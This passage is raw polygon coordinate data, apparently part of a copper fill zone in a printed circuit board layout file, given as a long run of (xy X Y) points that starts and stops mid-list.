66.54968) (xy 100.165426 66.657853) (xy 100.442665 66.713) (xy 100.725335 66.713) (xy 101.002574 66.657853) (xy 101.263727 66.54968) (xy 101.498759 66.392637) (xy 101.698637 66.192759) (xy 101.85568 65.957727) (xy 101.963853 65.696574) (xy 102.019 65.419335) (xy 102.019 65.136665) (xy 101.963853 64.859426) (xy 101.85568 64.598273) (xy 101.698637 64.363241) (xy 101.498759 64.163363) (xy 101.266241 64.008) (xy 101.374809 63.935457) (xy 108.104628 63.935457) (xy 108.168708 64.599158) (xy 108.361038 65.237605) (xy 108.674228 65.826262) (xy 108.681497 65.837141) (xy 109.125072 66.143323) (xy 111.326395 63.942) (xy 111.685605 63.942) (xy 113.886928 66.143323) (xy 114.330503 65.837141) (xy 114.645954 65.249694) (xy 114.84074 64.611992) (xy 114.907372 63.948543) (xy 114.843292 63.284842) (xy 114.650962 62.646395) (xy 114.337772 62.057738) (xy 114.330503 62.046859) (xy 113.886928 61.740677) (xy 111.685605 63.942) (xy 111.326395 63.942) (xy 109.125072 61.740677) (xy 108.681497 62.046859) (xy 108.366046 62.634306) (xy 108.17126 63.272008) (xy 108.104628 63.935457) (xy 101.374809 63.935457) (xy 101.498759 63.852637) (xy 101.698637 63.652759) (xy 101.85568 63.417727) (xy 101.963853 63.156574) (xy 102.019 62.879335) (xy 102.019 62.596665) (xy 101.963853 62.319426) (xy 101.85568 62.058273) (xy 101.698637 61.823241) (xy 101.498759 61.623363) (xy 101.266241 61.468) (xy 101.498759 61.312637) (xy 101.622357 61.189039) (xy 101.623188 61.197482) (xy 101.659498 61.31718) (xy 101.718463 61.427494) (xy 101.797815 61.524185) (xy 101.894506 61.603537) (xy 102.00482 61.662502) (xy 102.124518 61.698812) (xy 102.249 61.711072) (xy 103.999 61.711072) (xy 104.123482 61.698812) (xy 104.24318 61.662502) (xy 104.353494 61.603537) (xy 104.405237 61.561072) (xy 109.304677 61.561072) (xy 111.506 63.762395) (xy 113.707323 61.561072) (xy 113.401141 61.117497) (xy 112.813694 60.802046) (xy 112.175992 60.60726) (xy 111.512543 60.540628) (xy 110.848842 60.604708) (xy 110.210395 60.797038) (xy 109.621738 61.110228) (xy 109.610859 61.117497) (xy 109.304677 61.561072) (xy 104.405237 61.561072) (xy 104.450185 61.524185) (xy 104.529537 61.427494) (xy 104.588502 61.31718) (xy 104.624812 61.197482) (xy 104.637072 61.073) (xy 104.637072 59.323) (xy 104.624812 59.198518) (xy 104.588502 59.07882) (xy 104.529537 58.968506) (xy 104.450185 58.871815) (xy 104.353494 58.792463) (xy 104.24318 58.733498) (xy 104.197746 58.719716) (xy 104.296893 58.620569) (xy 104.462144 58.373253) (xy 104.575971 58.098451) (xy 104.634 57.806722) (xy 104.634 57.509278) (xy 104.575971 57.217549) (xy 104.462144 56.942747) (xy 104.296893 56.695431) (xy 104.086569 56.485107) (xy 103.941238 56.388) (xy 104.086569 56.290893) (xy 104.296893 56.080569) (xy 104.462144 55.833253) (xy 104.575971 55.558451) (xy 104.634 55.266722) (xy 104.634 54.969278) (xy 104.575971 54.677549) (xy 104.462144 54.402747) (xy 104.296893 54.155431) (xy 104.086569 53.945107) (xy 103.941238 53.848) (xy 104.086569 53.750893) (xy 104.296893 53.540569) (xy 104.462144 53.293253) (xy 104.575971 53.018451) (xy 104.634 52.726722) (xy 104.634 52.429278) (xy 104.575971 52.137549) (xy 104.462144 51.862747) (xy 104.296893 51.615431) (xy 104.086569 51.405107) (xy 103.839253 51.239856) (xy 103.564451 51.126029) (xy 103.272722 51.068) (xy 102.975278 51.068) (xy 102.683549 51.126029) (xy 102.408747 51.239856) (xy 102.161431 51.405107) (xy 101.951107 51.615431) (xy 101.808899 51.82826) (xy 101.698637 51.663241) (xy 101.498759 51.463363) (xy 101.266241 51.308) (xy 101.498759 51.152637) (xy 101.698637 50.952759) (xy 101.85568 50.717727) (xy 101.963853 50.456574) (xy 102.019 50.179335) (xy 102.019 49.896665) (xy 101.963853 49.619426) (xy 101.85568 49.358273) (xy 101.698637 49.123241) (xy 101.498759 48.923363) (xy 101.263727 48.76632) (xy 101.253135 48.761933) (xy 101.439131 48.650385) (xy 101.647519 48.461414) (xy 101.815037 48.23542) (xy 101.935246 47.981087) (xy 101.975904 47.847039) (xy 101.853915 47.625) (xy 100.711 47.625) (xy 100.711 47.645) (xy 100.457 47.645) (xy 100.457 47.625) (xy 99.314085 47.625) (xy 99.192096 47.847039) (xy 99.232754 47.981087) (xy 99.352963 48.23542) (xy 99.520481 48.461414) (xy 99.728869 48.650385) (xy 99.914865 48.761933) (xy 99.904273 48.76632) (xy 99.669241 48.923363) (xy 99.469363 49.123241) (xy 99.31232 49.358273) (xy 99.204147 49.619426) (xy 99.149 49.896665) (xy 94.399 49.896665) (xy 94.343853 49.619426) (xy 94.23568 49.358273) (xy 94.078637 49.123241) (xy 93.878759 48.923363) (xy 93.646241 48.768) (xy 93.878759 48.612637) (xy 94.078637 48.412759) (xy 94.23568 48.177727) (xy 94.343853 47.916574) (xy 94.399 47.639335) (xy 94.399 47.356665) (xy 94.357685 47.148961) (xy 99.192096 47.148961) (xy 99.314085 47.371) (xy 100.457 47.371) (xy 100.457 46.227376) (xy 100.711 46.227376) (xy 100.711 47.371) (xy 101.853915 47.371) (xy 101.975904 47.148961) (xy 101.935246 47.014913) (xy 101.815037 46.76058) (xy 101.647519 46.534586) (xy 101.439131 46.345615) (xy 101.197881 46.20093) (xy 100.93304 46.106091) (xy 100.711 46.227376) (xy 100.457 46.227376) (xy 100.23496 46.106091) (xy 99.970119 46.20093) (xy 99.728869 46.345615) (xy 99.520481 46.534586) (xy 99.352963 46.76058) (xy 99.232754 47.014913) (xy 99.192096 47.148961) (xy 94.357685 47.148961) (xy 94.343853 47.079426) (xy 94.23568 46.818273) (xy 94.078637 46.583241) (xy 93.878759 46.383363) (xy 93.643727 46.22632) (xy 93.382574 46.118147) (xy 93.105335 46.063) (xy 92.822665 46.063) (xy 92.545426 46.118147) (xy 92.284273 46.22632) (xy 92.049241 46.383363) (xy 91.849363 46.583241) (xy 91.69232 46.818273) (xy 91.584147 47.079426) (xy 91.529 47.356665) (xy 90.078861 47.356665) (xy 90.040359 47.330939) (xy 89.797405 47.230304) (xy 89.539486 47.179) (xy 89.276514 47.179) (xy 89.018595 47.230304) (xy 88.775641 47.330939) (xy 88.556987 47.477038) (xy 88.371038 47.662987) (xy 88.224939 47.881641) (xy 88.124304 48.124595) (xy 88.073 48.382514) (xy 88.073 48.645486) (xy 88.124304 48.903405) (xy 88.224939 49.146359) (xy 88.371038 49.365013) (xy 88.556987 49.550962) (xy 88.775641 49.697061) (xy 88.98553 49.784) (xy 88.775641 49.870939) (xy 88.556987 50.017038) (xy 88.371038 50.202987) (xy 88.224939 50.421641) (xy 88.138 50.63153) (xy 88.051061 50.421641) (xy 87.904962 50.202987) (xy 87.719013 50.017038) (xy 87.500359 49.870939) (xy 87.257405 49.770304) (xy 86.999486 49.719) (xy 86.736514 49.719) (xy 86.478595 49.770304) (xy 86.235641 49.870939) (xy 86.016987 50.017038) (xy 85.831038 50.202987) (xy 85.684939 50.421641) (xy 85.598 50.63153) (xy 85.511061 50.421641) (xy 85.364962 50.202987) (xy 85.179013 50.017038) (xy 84.960359 49.870939) (xy 84.717405 49.770304) (xy 84.459486 49.719) (xy 84.196514 49.719) (xy 83.938595 49.770304) (xy 83.695641 49.870939) (xy 83.476987 50.017038) (xy 83.291038 50.202987) (xy 83.144939 50.421641) (xy 83.058 50.63153) (xy 82.971061 50.421641) (xy 82.824962 50.202987) (xy 82.639013 50.017038) (xy 82.420359 49.870939) (xy 82.197813 49.778757) (xy 82.367123 49.716853) (xy 82.59066 49.580759) (xy 82.783351 49.40367) (xy 82.937792 49.192392) (xy 83.048047 48.955044) (xy 83.080716 48.847329) (xy 82.957374 48.641) (xy 81.915 48.641) (xy 81.915 48.661) (xy 81.661 48.661) (xy 81.661 48.641) (xy 80.618626 48.641) (xy 80.495284 48.847329) (xy 80.527953 48.955044) (xy 80.638208 49.192392) (xy 80.792649 49.40367) (xy 80.98534 49.580759) (xy 81.208877 49.716853) (xy 81.378187 49.778757) (xy 81.155641 49.870939) (xy 80.936987 50.017038) (xy 80.751038 50.202987) (xy 80.604939 50.421641) (xy 80.504304 50.664595) (xy 80.453 50.922514) (xy 37.766804 50.922514) (xy 37.718729 50.874439) (xy 37.787411 50.84599) (xy 38.030632 50.683475) (xy 38.237475 50.476632) (xy 38.39999 50.233411) (xy 38.511932 49.963158) (xy 38.569 49.67626) (xy 38.569 49.392702) (xy 44.094903 49.392702) (xy 44.166486 49.636671) (xy 44.421996 49.757571) (xy 44.696184 49.8263) (xy 44.978512 49.840217) (xy 45.25813 49.798787) (xy 45.524292 49.703603) (xy 45.649514 49.636671) (xy 45.721097 49.392702) (xy 44.908 48.579605) (xy 44.094903 49.392702) (xy 38.569 49.392702) (xy 38.569 49.38374) (xy 38.511932 49.096842) (xy 38.39999 48.826589) (xy 38.237475 48.583368) (xy 38.124619 48.470512) (xy 43.467783 48.470512) (xy 43.509213 48.75013) (xy 43.604397 49.016292) (xy 43.671329 49.141514) (xy 43.915298 49.213097) (xy 44.728395 48.4) (xy 43.915298 47.586903) (xy 43.671329 47.658486) (xy 43.550429 47.913996) (xy 43.4817 48.188184) (xy 43.467783 48.470512) (xy 38.124619 48.470512) (xy 38.030632 48.376525) (xy 37.85624 48.26) (xy 38.030632 48.143475) (xy 38.237475 47.936632) (xy 38.39999 47.693411) (xy 38.511932 47.423158) (xy 38.569 47.13626) (xy 38.569 46.84374) (xy 38.511932 46.556842) (xy 38.39999 46.286589) (xy 38.237475 46.043368) (xy 38.030632 45.836525) (xy 37.85624 45.72) (xy 38.030632 45.603475) (xy 38.237475 45.396632) (xy 38.39999 45.153411) (xy 38.511932 44.883158) (xy 38.569 44.59626) (xy 38.569 44.357911) (xy 41.991 44.357911) (xy 41.991 44.542089) (xy 42.026932 44.722729) (xy 42.097414 44.892889) (xy 42.199738 45.046028) (xy 42.329972 45.176262) (xy 42.483111 45.278586) (xy 42.653271 45.349068) (xy 42.833911 45.385) (xy 43.018089 45.385) (xy 43.198729 45.349068) (xy 43.368889 45.278586) (xy 43.471535 45.21) (xy 43.624007 45.21) (xy 43.528147 45.441426) (xy 43.473 45.718665) (xy 43.473 46.001335) (xy 43.528147 46.278574) (xy 43.63632 46.539727) (xy 43.793363 46.774759) (xy 43.993241 46.974637) (xy 44.227128 47.130915) (xy 44.166486 47.163329) (xy 44.094903 47.407298) (xy 44.908 48.220395) (xy 45.721097 47.407298) (xy 45.649514 47.163329) (xy 45.585008 47.132806) (xy 45.587727 47.13168) (xy 45.822759 46.974637) (xy 46.022637 46.774759) (xy 46.178 46.542241) (xy 46.333363 46.774759) (xy 46.533241 46.974637) (xy 46.765759 47.13) (xy 46.533241 47.285363) (xy 46.333363 47.485241) (xy 46.177085 47.719128) (xy 46.144671 47.658486) (xy 45.900702 47.586903) (xy 45.087605 48.4) (xy 45.900702 49.213097) (xy 46.144671 49.141514) (xy 46.175194 49.077008) (xy 46.17632 49.079727) (xy 46.333363 49.314759) (xy 46.533241 49.514637) (xy 46.768273 49.67168) (xy 47.029426 49.779853) (xy 47.306665 49.835) (xy 47.589335 49.835) (xy 47.866574 49.779853) (xy 48.127727 49.67168) (xy 48.362759 49.514637) (xy 48.562637 49.314759) (xy 48.718 49.082241) (xy 48.873363 49.314759) (xy 49.073241 49.514637) (xy 49.308273 49.67168) (xy 49.569426 49.779853) (xy 49.846665 49.835) (xy 50.129335 49.835) (xy 50.406574 49.779853) (xy 50.667727 49.67168) (xy 50.902759 49.514637) (xy 51.102637 49.314759) (xy 51.25968 49.079727) (xy 51.367853 48.818574) (xy 51.423 48.541335) (xy 51.423 48.258665) (xy 51.375561 48.020173) (xy 52.683 48.020173) (xy 52.683 48.499827) (xy 52.776576 48.970263) (xy 52.960131 49.413405) (xy 53.226612 49.812222) (xy 53.565778 50.151388) (xy 53.964595 50.417869) (xy 54.407737 50.601424) (xy 54.878173 50.695) (xy 55.357827 50.695) (xy 55.828263 50.601424) (xy 56.271405 50.417869) (xy 56.670222 50.151388) (xy 57.009388 49.812222) (xy 57.275869 49.413405) (xy 57.459424 48.970263) (xy 57.553 48.499827) (xy 57.553 48.180671) (xy 80.495284 48.180671) (xy 80.618626 48.387) (xy 81.661 48.387) (xy 81.661 47.343799) (xy 81.915 47.343799) (xy 81.915 48.387) (xy 82.957374 48.387) (xy 83.080716 48.180671) (xy 83.048047 48.072956) (xy 82.937792 47.835608) (xy 82.783351 47.62433) (xy 82.59066 47.447241) (xy 82.367123 47.311147) (xy 82.12133 47.221278) (xy 81.915 47.343799) (xy 81.661 47.343799) (xy 81.45467 47.221278) (xy 81.208877 47.311147) (xy 80.98534 47.447241) (xy 80.792649 47.62433) (xy 80.638208 47.835608) (xy 80.527953 48.072956) (xy 80.495284 48.180671) (xy 57.553 48.180671) (xy 57.553 48.020173) (xy 57.459424 47.549737) (xy 57.275869 47.106595) (xy 57.009388 46.707778) (xy 56.670222 46.368612) (xy 56.271405 46.102131) (xy 55.828263 45.918576) (xy 55.357827 45.825) (xy 54.878173 45.825) (xy 54.407737 45.918576) (xy 53.964595 46.102131) (xy 53.565778 46.368612) (xy 53.226612 46.707778) (xy 52.960131 47.106595) (xy 52.776576 47.549737) (xy 52.683 48.020173) (xy 51.375561 48.020173) (xy 51.367853 47.981426) (xy 51.25968 47.720273) (xy 51.102637 47.485241) (xy 50.902759 47.285363) (xy 50.670241 47.13) (xy 50.902759 46.974637) (xy 51.102637 46.774759) (xy 51.206043 46.62) (xy 51.638678 46.62) (xy 51.676 46.623676) (xy 51.713322 46.62) (xy 51.713333 46.62) (xy 51.824986 46.609003) (xy 51.968247 46.565546) (xy 52.100276 46.494974) (xy 52.216001 46.400001) (xy 52.239804 46.370997) (xy 52.983649 45.627153) (xy 53.104729 45.603068) (xy 53.274889 45.532586) (xy 53.428028 45.430262) (xy 53.558262 45.300028) (xy 53.660586 45.146889) (xy 53.731068 44.976729) (xy 53.767 44.796089) (xy 53.767 44.611911) (xy 53.734396 44.448) (xy 55.334465 44.448) (xy 55.437111 44.516586) (xy 55.607271 44.587068) (xy 55.787911 44.623) (xy 55.972089 44.623) (xy 56.152729 44.587068) (xy 56.322889 44.516586) (xy 56.476028 44.414262) (xy 56.606262 44.284028) (xy 56.708586 44.130889) (xy 56.779068 43.960729) (xy 56.815 43.780089) (xy 56.815 43.595911) (xy 56.779068 43.415271) (xy 56.708586 43.245111) (xy 56.606262 43.091972) (xy 56.476028 42.961738) (xy 56.322889 42.859414) (xy 56.152729 42.788932) (xy 55.972089 42.753) (xy 55.787911 42.753) (xy 55.607271 42.788932) (xy 55.437111 42.859414) (xy 55.334465 42.928) (xy 48.551535 42.928) (xy 48.448889 42.859414) (xy 48.278729 42.788932) (xy 48.098089 42.753) (xy 47.913911 42.753) (xy 47.733271 42.788932) (xy 47.563111 42.859414) (xy 47.409972 42.961738) (xy 47.279738 43.091972) (xy 47.177414 43.245111) (xy 47.106932 43.415271) (xy 47.071 43.595911) (xy 47.071 43.69) (xy 43.471535 43.69) (xy 43.368889 43.621414) (xy 43.198729 43.550932) (xy 43.018089 43.515) (xy 42.833911 43.515) (xy 42.653271 43.550932) (xy 42.483111 43.621414) (xy 42.329972 43.723738) (xy 42.199738 43.853972) (xy 42.097414 44.007111) (xy 42.026932 44.177271) (xy 41.991 44.357911) (xy 38.569 44.357911) (xy 38.569 44.30374) (xy 38.511932 44.016842) (xy 38.39999 43.746589) (xy 38.237475 43.503368) (xy 38.030632 43.296525) (xy 37.85624 43.18) (xy 38.030632 43.063475) (xy 38.237475 42.856632) (xy 38.39999 42.613411) (xy 38.511932 42.343158) (xy 38.569 42.05626) (xy 38.569 41.76374) (xy 38.542935 41.632702) (xy 48.796903 41.632702) (xy 48.868486 41.876671) (xy 49.123996 41.997571) (xy 49.398184 42.0663) (xy 49.680512 42.080217) (xy 49.96013 42.038787) (xy 50.226292 41.943603) (xy 50.351514 41.876671) (xy 50.423097 41.632702) (xy 49.61 40.819605) (xy 48.796903 41.632702) (xy 38.542935 41.632702) (xy 38.511932 41.476842) (xy 38.39999 41.206589) (xy 38.237475 40.963368) (xy 38.030632 40.756525) (xy 37.961769 40.710512) (xy 48.169783 40.710512) (xy 48.211213 40.99013) (xy 48.306397 41.256292) (xy 48.373329 41.381514) (xy 48.617298 41.453097) (xy 49.430395 40.64) (xy 49.789605 40.64) (xy 50.602702 41.453097) (xy 50.846671 41.381514) (xy 50.967571 41.126004) (xy 51.0363 40.851816) (xy 51.050217 40.569488) (xy 51.039724 40.498665) (xy 53.175 40.498665) (xy 53.175 40.781335) (xy 53.230147 41.058574) (xy 53.33832 41.319727) (xy 53.495363 41.554759) (xy 53.695241 41.754637) (xy 53.930273 41.91168) (xy 54.191426 42.019853) (xy 54.468665 42.075) (xy 54.751335 42.075) (xy 55.028574 42.019853) (xy 55.289727 41.91168) (xy 55.524759 41.754637) (xy 55.724637 41.554759) (xy 55.88168 41.319727) (xy 55.989853 41.058574) (xy 56.045 40.781335) (xy 56.045 40.498665) (xy 55.989853 40.221426) (xy 55.88168 39.960273) (xy 55.724637 39.725241) (xy 55.524759 39.525363) (xy 55.289727 39.36832) (xy 55.028574 39.260147) (xy 54.751335 39.205) (xy 54.468665 39.205) (xy 54.191426 39.260147) (xy 53.930273 39.36832) (xy 53.695241 39.525363) (xy 53.495363 39.725241) (xy 53.33832 39.960273) (xy 53.230147 40.221426) (xy 53.175 40.498665) (xy 51.039724 40.498665) (xy 51.008787 40.28987) (xy 50.913603 40.023708) (xy 50.846671 39.898486) (xy 50.602702 39.826903) (xy 49.789605 40.64) (xy 49.430395 40.64) (xy 48.617298 39.826903) (xy 48.373329 39.898486) (xy 48.252429 40.153996) (xy 48.1837 40.428184) (xy 48.169783 40.710512) (xy 37.961769 40.710512) (xy 37.85624 40.64) (xy 38.030632 40.523475) (xy 38.237475 40.316632) (xy 38.39999 40.073411) (xy 38.511932 39.803158) (xy 38.542934 39.647298) (xy 48.796903 39.647298) (xy 49.61 40.460395) (xy 50.423097 39.647298) (xy 50.351514 39.403329) (xy 50.096004 39.282429) (xy 49.821816 39.2137) (xy 49.539488 39.199783) (xy 49.25987 39.241213) (xy 48.993708 39.336397) (xy 48.868486 39.403329) (xy 48.796903 39.647298) (xy 38.542934 39.647298) (xy 38.569 39.51626) (xy 38.569 39.22374) (xy 38.511932 38.936842) (xy 38.39999 38.666589) (xy 38.237475 38.423368) (xy 38.206107 38.392) (xy 45.551928 38.392) (xy 45.564188 38.516482) (xy 45.600498 38.63618) (xy 45.659463 38.746494) (xy 45.738815 38.843185) (xy 45.835506 38.922537) (xy 45.94582 38.981502) (xy 46.065518 39.017812) (xy 46.19 39.030072) (xy 46.70425 39.027) (xy 46.863 38.86825) (xy 46.863 37.719) (xy 45.71375 37.719) (xy 45.555 37.87775) (xy 45.551928 38.392) (xy 38.206107 38.392) (xy 38.030632 38.216525) (xy 37.848466 38.094805) (xy 37.965355 38.025178) (xy 38.181588 37.830269) (xy 38.355641 37.59692) (xy 38.480825 37.334099) (xy 38.525476 37.18689) (xy 38.404155 36.957) (xy 37.211 36.957) (xy 37.211 36.977) (xy 36.957 36.977) (xy 36.957 36.957) (xy 34.671 36.957) (xy 34.671 36.977) (xy 34.417 36.977) (xy 34.417 36.957) (xy 33.223845 36.957) (xy 33.102524 37.18689) (xy 33.147175 37.334099) (xy 33.272359 37.59692) (xy 33.446412 37.830269) (xy 33.662645 38.025178) (xy 33.779534 38.094805) (xy 33.597368 38.216525) (xy 33.390525 38.423368) (xy 33.29923 38.56) (xy 33.101513 38.56) (xy 31.297377 36.755865) (xy 31.307 36.707486) (xy 31.307 36.444514) (xy 31.255696 36.186595) (xy 31.155061 35.943641) (xy 31.008962 35.724987) (xy 30.823013 35.539038) (xy 30.604359 35.392939) (xy 30.361405 35.292304) (xy 30.103486 35.241) (xy 29.840514 35.241) (xy 29.582595 35.292304) (xy 29.339641 35.392939) (xy 29.120987 35.539038) (xy 28.935038 35.724987) (xy 28.788939 35.943641) (xy 28.688304 36.186595) (xy 28.637 36.444514) (xy 23.887 36.444514) (xy 23.887 36.170816) (xy 23.828011 35.874257) (xy 23.712299 35.594905) (xy 23.544312 35.343495) (xy 23.330505 35.129688) (xy 23.079095 34.961701) (xy 23.023717 34.938763) (xy 23.203013 34.818962) (xy 23.388962 34.633013) (xy 23.535061 34.414359) (xy 23.635696 34.171405) (xy 23.687 33.913486) (xy 23.687 33.650514) (xy 28.637 33.650514) (xy 28.637 33.913486) (xy 28.688304 34.171405) (xy 28.788939 34.414359) (xy 28.935038 34.633013) (xy 29.120987 34.818962) (xy 29.339641 34.965061) (xy 29.582595 35.065696) (xy 29.840514 35.117) (xy 30.103486 35.117) (xy 30.361405 35.065696) (xy 30.604359 34.965061) (xy 30.823013 34.818962) (xy 31.008962 34.633013) (xy 31.155061 34.414359) (xy 31.255696 34.171405) (xy 31.307 33.913486) (xy 31.307 33.650514) (xy 31.265126 33.44) (xy 33.055928 33.44) (xy 33.055928 35.14) (xy 33.068188 35.264482) (xy 33.104498 35.38418) (xy 33.163463 35.494494) (xy 33.242815 35.591185) (xy 33.339506 35.670537) (xy 33.44982 35.729502) (xy 33.530466 35.753966) (xy 33.446412 35.829731) (xy 33.272359 36.06308) (xy 33.147175 36.325901) (xy 33.102524 36.47311) (xy 33.223845 36.703) (xy 34.417 36.703) (xy 34.417 36.683) (xy 34.671 36.683) (xy 34.671 36.703) (xy 36.957 36.703) (xy 36.957 36.683) (xy 37.211 36.683) (xy 37.211 36.703) (xy 38.404155 36.703) (xy 38.525476 36.47311) (xy 38.480825 36.325901) (xy 38.355641 36.06308) (xy 38.181588 35.829731) (xy 37.965355 35.634822) (xy 37.848466 35.565195) (xy 38.030632 35.443475) (xy 38.237475 35.236632) (xy 38.39999 34.993411) (xy 38.511932 34.723158) (xy 38.569 34.43626) (xy 38.569 34.14374) (xy 38.511932 33.856842) (xy 38.39999 33.586589) (xy 38.237475 33.343368) (xy 38.030632 33.136525) (xy 37.787411 32.97401) (xy 37.676118 32.927911) (xy 43.515 32.927911) (xy 43.515 33.112089) (xy 43.550932 33.292729) (xy 43.621414 33.462889) (xy 43.69 33.565536) (xy 43.690001 36.538463) (xy 43.621414 36.641111) (xy 43.550932 36.811271) (xy 43.515 36.991911) (xy 43.515 37.176089) (xy 43.550932 37.356729) (xy 43.621414 37.526889) (xy 43.723738 37.680028) (xy 43.853972 37.810262) (xy 44.007111 37.912586) (xy 44.177271 37.983068) (xy 44.357911 38.019) (xy 44.542089 38.019) (xy 44.722729 37.983068) (xy 44.892889 37.912586) (xy 45.046028 37.810262) (xy 45.176262 37.680028) (xy 45.278586 37.526889) (xy 45.349068 37.356729) (xy 45.385 37.176089) (xy 45.385 36.991911) (xy 45.349068 36.811271) (xy 45.341086 36.792) (xy 45.551928 36.792) (xy 45.555 37.30625) (xy 45.71375 37.465) (xy 46.863 37.465) (xy 46.863 36.31575) (xy 47.117 36.31575) (xy 47.117 37.465) (xy 47.137 37.465) (xy 47.137 37.719) (xy 47.117 37.719) (xy 47.117 38.86825) (xy 47.27575 39.027) (xy 47.79 39.030072) (xy 47.914482 39.017812) (xy 48.03418 38.981502) (xy 48.144494 38.922537) (xy 48.241185 38.843185) (xy 48.320537 38.746494) (xy 48.379502 38.63618) (xy 48.415812 38.516482) (xy 48.416643 38.508039) (xy 48.615241 38.706637) (xy 48.850273 38.86368) (xy 49.111426 38.971853) (xy 49.388665 39.027) (xy 49.671335 39.027) (xy 49.948574 38.971853) (xy 50.209727 38.86368) (xy 50.444759 38.706637) (xy 50.644637 38.506759) (xy 50.8 38.274241) (xy 50.955363 38.506759) (xy 51.155241 38.706637) (xy 51.390273 38.86368) (xy 51.651426 38.971853) (xy 51.928665 39.027) (xy 52.211335 39.027) (xy 52.488574 38.971853) (xy 52.749727 38.86368) (xy 52.984759 38.706637) (xy 53.184637 38.506759) (xy 53.34168 38.271727) (xy 53.346067 38.261135) (xy 53.457615 38.447131) (xy 53.646586 38.655519) (xy 53.87258 38.823037) (xy 54.126913 38.943246) (xy 54.260961 38.983904) (xy 54.483 38.861915) (xy 54.483 37.719) (xy 54.463 37.719) (xy 54.463 37.465) (xy 54.483 37.465) (xy 54.483 36.322085) (xy 54.737 36.322085) (xy 54.737 37.465) (xy 54.757 37.465) (xy 54.757 37.719) (xy 54.737 37.719) (xy 54.737 38.861915) (xy 54.959039 38.983904) (xy 55.093087 38.943246) (xy 55.34742 38.823037) (xy 55.573414 38.655519) (xy 55.762385 38.447131) (xy 55.873933 38.261135) (xy 55.87832 38.271727) (xy 56.035363 38.506759) (xy 56.235241 38.706637) (xy 56.470273 38.86368) (xy 56.731426 38.971853) (xy 57.008665 39.027) (xy 57.291335 39.027) (xy 57.568574 38.971853) (xy 57.829727 38.86368) (xy 58.064759 38.706637) (xy 58.264637 38.506759) (xy 58.42 38.274241) (xy 58.575363 38.506759) (xy 58.775241 38.706637) (xy 59.010273 38.86368) (xy 59.271426 38.971853) (xy 59.548665 39.027) (xy 59.831335 39.027) (xy 60.108574 38.971853) (xy 60.369727 38.86368) (xy 60.604759 38.706637) (xy 60.804637 38.506759) (xy 60.96 38.274241) (xy 61.115363 38.506759) (xy 61.315241 38.706637) (xy 61.550273 38.86368) (xy 61.811426 38.971853) (xy 62.088665 39.027) (xy 62.371335 39.027) (xy 62.648574 38.971853) (xy 62.909727 38.86368) (xy 63.144759 38.706637) (xy 63.344637 38.506759) (xy 63.50168 38.271727) (xy 63.506067 38.261135) (xy 63.617615 38.447131) (xy 63.806586 38.655519) (xy 64.03258 38.823037) (xy 64.286913 38.943246) (xy 64.420961 38.983904) (xy 64.643 38.861915) (xy 64.643 37.719) (xy 64.897 37.719) (xy 64.897 38.861915) (xy 65.119039 38.983904) (xy 65.253087 38.943246) (xy 65.50742 38.823037) (xy 65.733414 38.655519) (xy 65.922385 38.447131) (xy 66.04 38.251018) (xy 66.157615 38.447131) (xy 66.346586 38.655519) (xy 66.57258 38.823037) (xy 66.826913 38.943246) (xy 66.960961 38.983904) (xy 67.183 38.861915) (xy 67.183 37.719) (xy 67.437 37.719) (xy 67.437 38.861915) (xy 67.659039 38.983904) (xy 67.793087 38.943246) (xy 68.04742 38.823037) (xy 68.273414 38.655519) (xy 68.462385 38.447131) (xy 68.60707 38.205881) (xy 68.69207 37.968514) (xy 71.817 37.968514) (xy 71.817 38.231486) (xy 71.868304 38.489405) (xy 71.968939 38.732359) (xy 72.115038 38.951013) (xy 72.300987 39.136962) (xy 72.392 39.197775) (xy 72.392001 44.666463) (xy 72.323414 44.769111) (xy 72.252932 44.939271) (xy 72.217 45.119911) (xy 72.217 45.304089) (xy 72.252932 45.484729) (xy 72.323414 45.654889) (xy 72.425738 45.808028) (xy 72.555972 45.938262) (xy 72.709111 46.040586) (xy 72.879271 46.111068) (xy 73.059911 46.147) (xy 73.244089 46.147) (xy 73.424729 46.111068) (xy 73.594889 46.040586) (xy 73.748028 45.938262) (xy 73.878262 45.808028) (xy 73.980586 45.654889) (xy 74.051068 45.484729) (xy 74.087 45.304089) (xy 74.087 45.119911) (xy 74.051068 44.939271) (xy 73.980586 44.769111) (xy 73.912 44.666465) (xy 73.912 42.325911) (xy 103.713 42.325911) (xy 103.713 42.510089) (xy 103.748932 42.690729) (xy 103.819414 42.860889) (xy 103.888 42.963536) (xy 103.888 43.396677) (xy 103.884324 43.434) (xy 103.888 43.471322) (xy 103.888 43.471332) (xy 103.898997 43.582985) (xy 103.931459 43.69) (xy 103.942454 43.726246) (xy 104.013026 43.858276) (xy 104.027091 43.875414) (xy 104.107999 43.974001) (xy 104.137003 43.997804) (xy 107.640205 47.501008) (xy 107.663999 47.530001) (xy 107.692992 47.553795) (xy 107.692996 47.553799) (xy 107.733334 47.586903) (xy 107.779724 47.624974) (xy 107.911753 47.695546) (xy 108.055014 47.739003) (xy 108.081376 47.7416) (xy 108.046068 47.826842) (xy 107.989 48.11374) (xy 107.989 48.40626) (xy 108.046068 48.693158) (xy 108.15801 48.963411) (xy 108.320525 49.206632) (xy 108.527368 49.413475) (xy 108.70176 49.53) (xy 108.527368 49.646525) (xy 108.320525 49.853368) (xy 108.15801 50.096589) (xy 108.046068 50.366842) (xy 107.989 50.65374) (xy 107.989 50.94626) (xy 108.046068 51.233158) (xy 108.15801 51.503411) (xy 108.320525 51.746632) (xy 108.527368 51.953475) (xy 108.70176 52.07) (xy 108.527368 52.186525) (xy 108.320525 52.393368) (xy 108.15801 52.636589) (xy 108.046068 52.906842) (xy 107.989 53.19374) (xy 107.989 53.48626) (xy 108.046068 53.773158) (xy 108.15801 54.043411) (xy 108.320525 54.286632) (xy 108.527368 54.493475) (xy 108.770589 54.65599) (xy 109.040842 54.767932) (xy 109.32774 54.825) (xy 109.62026 54.825) (xy 109.907158 54.767932) (xy 110.177411 54.65599) (xy 110.420632 54.493475) (xy 110.627475 54.286632) (xy 110.744 54.11224) (xy 110.860525 54.286632) (xy 111.067368 54.493475) (xy 111.310589 54.65599) (xy 111.580842 54.767932) (xy 111.86774 54.825) (xy 112.16026 54.825) (xy 112.447158 54.767932) (xy 112.717411 54.65599) (xy 112.960632 54.493475) (xy 113.167475 54.286632) (xy 113.32999 54.043411) (xy 113.441932 53.773158) (xy 113.499 53.48626) (xy 113.499 53.19374) (xy 113.441932 52.906842) (xy 113.32999 52.636589) (xy 113.167475 52.393368) (xy 112.960632 52.186525) (xy 112.78624 52.07) (xy 112.960632 51.953475) (xy 113.167475 51.746632) (xy 113.32999 51.503411) (xy 113.441932 51.233158) (xy 113.499 50.94626) (xy 113.499 